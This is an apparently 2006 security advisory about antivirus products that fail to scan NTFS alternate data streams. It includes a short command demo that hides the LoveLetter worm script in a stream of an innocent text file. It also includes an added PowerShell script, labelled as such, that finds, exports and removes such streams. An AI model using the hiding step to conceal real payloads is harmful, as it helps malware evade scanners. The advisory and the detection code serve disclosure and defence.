Multiple Vendor NTFS Data Stream Malware Stealth Technique
----------------------------------------------------------

Affected product/vendors:

Panda Software. All products.
ClamWin. All versions.
Norman Virus Control. All versions.
AVG Antivirus.

Non-affected vendors:

McAfee / Computer Associates
Avira AntiVir PersonalEdition Classic

Technique Description
---------------------

This is not in any way a new technique: the first proof of concept of hiding malware in an NTFS alternate data stream was published in 2000. Apparently the technique was not very popular, and as a result 75% (or more) of the anti-virus industry has ignored it.

The technique is as simple as follows. Download a virus file, even an old one. Call it, for example, 'iloveyou.vbs'. Next, go to a command prompt:

------------------------------------------------------------------------------------------------------
C:\>echo I'm an inocent file. > file.txt

C:\>type file.txt
I'm an inocent file.

C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is 8475-DDEF

 Directory of C:\

06/03/2006  01:10    <DIR>          Documents and Settings
03/06/2006  05:10                23 file.txt
03/06/2006  04:52            10.320 iloveyou.txt
03/06/2006  04:52            10.320 iloveyou.vbs
26/12/2005  00:51    <DIR>          Inetpub
03/06/2006  05:09    <DIR>          Program Files
29/05/2006  23:24                12 test1.vbs
03/06/2006  05:06    <DIR>          WINNT
               4 File(s)         20.675 bytes
               4 Dir(s)   2.539.368.448 bytes free

C:\>type iloveyou.vbs > file.txt:virus.vbs

C:\>type file.txt
I'm an inocent file.

C:\>more < file.txt:virus.vbs
rem  barok -loveletter(vbe)
rem  by: spyder  /  ispyder@mail.com  /  @GRAMMERSoft Group  /
(...)
---More---
------------------------------------------------------------------------------------------------------

Now, try scanning your system with your preferred vulnerable antivirus product. The first file, 'iloveyou.vbs' in a normal data stream, will (surely) be detected, but not the copy of it stored in an alternate data stream of the apparently innocent file c:\file.txt.
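Because the affected scanners only look at a file's default data stream, an administrator has to enumerate the alternate streams separately to see what they missed. The PowerShell script below is an added example and is not part of the original advisory or of any vendor's product: it lists every named stream under a directory (so the advisory's file.txt:virus.vbs would appear as a stream named virus.vbs on C:\file.txt), flags the streams Windows itself writes, and can copy a suspicious stream out into an ordinary file where a default-stream scanner will examine it. It assumes Windows PowerShell 3.0 or later, where Get-Item and Get-Content accept the -Stream parameter; the function names, the $knownBenign list and the quarantine path are this example's own choices.

```powershell
# Added example, not code from the advisory. Enumerate NTFS alternate data
# streams so that content a default-stream-only scanner skipped is visible.
# Assumes Windows PowerShell 3.0+ (-Stream support on the file system provider).

# Streams written by Windows itself; reported but marked benign so they do
# not hide anything unexpected. Zone.Identifier is the "Mark of the Web"
# placed on downloaded files.
$knownBenign = @('Zone.Identifier')

function Find-AlternateDataStreams {
    param(
        [string]$Root = 'C:\',
        [switch]$Recurse
    )

    $files = Get-ChildItem -LiteralPath $Root -File -Force -Recurse:$Recurse `
        -ErrorAction SilentlyContinue

    foreach ($file in $files) {
        # -Stream * lists every stream of the file, including the unnamed
        # default stream, which PowerShell reports as ':$DATA'.
        $streams = Get-Item -LiteralPath $file.FullName -Stream * `
            -ErrorAction SilentlyContinue |
            Where-Object { $_.Stream -ne ':$DATA' }

        foreach ($s in $streams) {
            [pscustomobject]@{
                File   = $file.FullName
                Stream = $s.Stream
                Length = $s.Length
                Benign = ($knownBenign -contains $s.Stream)
            }
        }
    }
}

function Export-AlternateDataStream {
    # Copy one named stream into a regular file (default stream) so that a
    # scanner that ignores alternate streams can inspect it. The quarantine
    # directory is an assumption of this example.
    param(
        [Parameter(Mandatory)][string]$File,
        [Parameter(Mandatory)][string]$Stream,
        [string]$QuarantineDir = 'C:\ADS-Quarantine'
    )

    New-Item -ItemType Directory -Path $QuarantineDir -Force | Out-Null
    $leaf = (Split-Path -Leaf $File) + '__' + $Stream
    $dest = Join-Path $QuarantineDir $leaf

    # Byte-exact copy; the byte-mode parameter was renamed in PowerShell 6.
    if ($PSVersionTable.PSVersion.Major -ge 6) {
        $bytes = Get-Content -LiteralPath $File -Stream $Stream -AsByteStream -ReadCount 0
        Set-Content -LiteralPath $dest -Value $bytes -AsByteStream
    } else {
        $bytes = Get-Content -LiteralPath $File -Stream $Stream -Encoding Byte -ReadCount 0
        Set-Content -LiteralPath $dest -Value $bytes -Encoding Byte
    }
    return $dest
}

# Usage: list non-benign streams under C:\ and export each one for scanning.
$findings = Find-AlternateDataStreams -Root 'C:\' -Recurse
$findings | Format-Table -AutoSize

foreach ($f in ($findings | Where-Object { -not $_.Benign })) {
    $copy = Export-AlternateDataStream -File $f.File -Stream $f.Stream
    Write-Host "Exported $($f.File):$($f.Stream) -> $copy"
}
```

Once a stream has been confirmed as unwanted it can be deleted without touching the carrier file: `Remove-Item -LiteralPath C:\file.txt -Stream virus.vbs`. Note that copying a file to a non-NTFS volume (FAT, most network shares) silently drops all alternate streams, which is why a payload hidden this way survives only while it stays on NTFS.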
Disclaimer
----------

The information in this advisory and any of its demonstrations is provided "as is" without any warranty of any kind. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory.

---------------------------------------------------------------------------

Contact
-------

Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<>>>>es